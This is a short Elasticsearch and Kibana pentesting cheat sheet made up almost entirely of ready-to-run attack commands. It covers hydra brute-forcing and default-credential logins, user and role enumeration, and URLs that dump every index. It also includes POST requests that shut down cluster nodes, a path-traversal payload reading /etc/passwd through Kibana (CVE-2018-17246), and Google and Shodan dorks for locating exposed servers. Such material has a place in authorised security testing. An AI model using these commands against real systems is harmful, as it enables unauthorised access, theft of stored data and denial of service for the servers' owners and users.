ElasticSearch Pentesting

ElasticSearch exploit and Pentesting guide for penetration tester

What is an Elasticsearch index?

An Elasticsearch index is a collection of documents that are related to each other. Elasticsearch stores data as JSON documents

Brute Force Credentials

 hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /

Default credentials

curl -X GET http://admin:elasticadmin@target:9200/
curl -X GET http://elastic:changeme@target:9200/

Basic User Enumeration

## List all roles on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role"

#List all users on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"

#Get more information about the rights of an user:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"

Elastic Info

curl -X GET http://target:9200/_cat/
curl -X GET http://target:9200/_cluster/
curl -X GET http://target:9200/_nodes/
curl -X GET http://target:9200/_remote/
curl -X GET http://target:9200/_security/

List All indexes

http://target:9200/_cat/indices?v&s=docs.count

Dump index

http://target:9200/<index>/_search?pretty=true&size=100
http://target:9200/bank/_search?pretty=true

Dump all

http://target:9200/_search?pretty=true

search

http://target:9200/_search?pretty=true&q=<search_term>
http://target:9200/<index>/_search?pretty=true&q=<search_term>

Shutting Down Nodes

curl -X POST http://target:9200/_shutdown
curl -X POST http://target:9200/_cluster/nodes/_master/_shutdown

Elastic Search Kibana Console LFI (CVE-2018-17246)

http://target:9200/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

Google Dorks to find Kibana Instances

inurl:app/kibana
inurl:app/kibana intext:Loading Kibana
inurl::5601/app/kibana

Shodan Dorks to finding Kibana Instances

port:9200 elasticsearch
Dork: title:"kibana" port:"443"
Dork: kibana content-length: 217